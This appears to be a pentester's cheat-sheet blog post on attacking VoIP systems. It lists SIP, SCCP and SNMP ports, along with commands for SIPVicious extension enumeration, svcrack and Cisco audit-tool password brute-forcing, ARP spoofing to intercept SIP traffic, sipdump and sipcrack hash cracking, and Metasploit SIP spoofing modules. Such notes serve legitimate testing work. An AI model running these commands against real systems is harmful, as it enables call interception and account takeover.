- SNMP is enabled on many VOIP Devices; check for it
VOIP Protocols
- H.323 - Can Initiate, authenticate, end a request.
- Session Initiation Protocol (SIP) - ASCII protocol - reqeuest/response.
- Real-Time Transport Protocol (RTP) - After connecting via VOIP, RTP is used
- Secure Real time Transport Protocol (SRTP)
#Nmap
nmap -O -P0 10.10.10.0/23
#Ports
UDP/TCP - 5060 & 5061
#Cisco SCCP Enabled ports
UDP/TCP - 2000-2001
#UDP or TCP - VXWORKS remote debugging
Port 17185
# cisco-audit-tool
CAT -h ip -p 2000 -w /usr/share/wordlists/rockyou.txt
# cisco-smart-install
https://github.com/Sab0tag3d/SIET/
sudo python siet.py -g -i 192.168.0.1
Enumeration
SIP - 'User Agent' & 'Server'
SIP phone Extensions (usernames)
TFTP Config files
SNMP Config
Using Netcat
nc 10.10.10.10 5060
> OPTIONS sip:test@10.10.10.10 SIP/2.0
SNMP
snmpwalk -c public -v 10.10.10.10 1.3.6.1.4.1.6889
SIPVicious Github
python3 setup.py install #Scan a set of IP's concurrenrly for ip in $(cat $1); do sipvicious_svmap -p5060-5200 $ip & donesipvicious_svmap 10.10.10.10 -p5060-5200
#Enum
sipvicious_svmap 10.10.10.10 -p5060-5200 -m INVITE
sipvicious_svwar udp://10.10.10.10:5070 -e100-500
sipvicious_svmap 192.168.1.1-254
sipvicious_svmap 192.168.1.1-254 --fp
#Extension Enum
svwar.py -e100-400 192.168.1.104
svwar.py -e100-400 192.168.1.104 -m INVITE -v
#svmap, send SIP OPTIONS
svmap -p5060,5061,5080-5090 10.0.0.1
#svcrack
svcrack -u100 -d dictionary.txt 10.0.0.1
#Capture the SIP Traffic
#arpspoof, sipdump & Sipcrack are inbuilt in kali
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof –t victim gateway
arpspoof –t gateway victim
Wireshark > not broadcast and not multicast and host <IP ADDRESS>
#Capturing SIP Authentication using SIPDump
sipdump -i eth0
sipdump -i eth0 auth.txt
sipdump -p /root/registration.pcap auth.txt
#cracking response hahses
sipcrack -w sipass.txt auth.txt
#Bruteforcing SIP accounts using svcrack from SIPVIcious
svcrack.py -u200 -d wordlist.txt 192.168.1.104
svcrack.py -u200 -r100000-999999 192.168.1.104
#Enum using Metasploit
#Scan for SIP Devices
use auxiliary/scanner/sip/options
#Enum SIP extensions/Usernames
use scanner/sip/enumerator
set RHOSTS 10.10.10.10
set MINEXT 100
set MAXEXT 500
set PADLEN 3
#Spoofing
use voip/sip_invite_spoof
might also try Responder
Comments
Post a Comment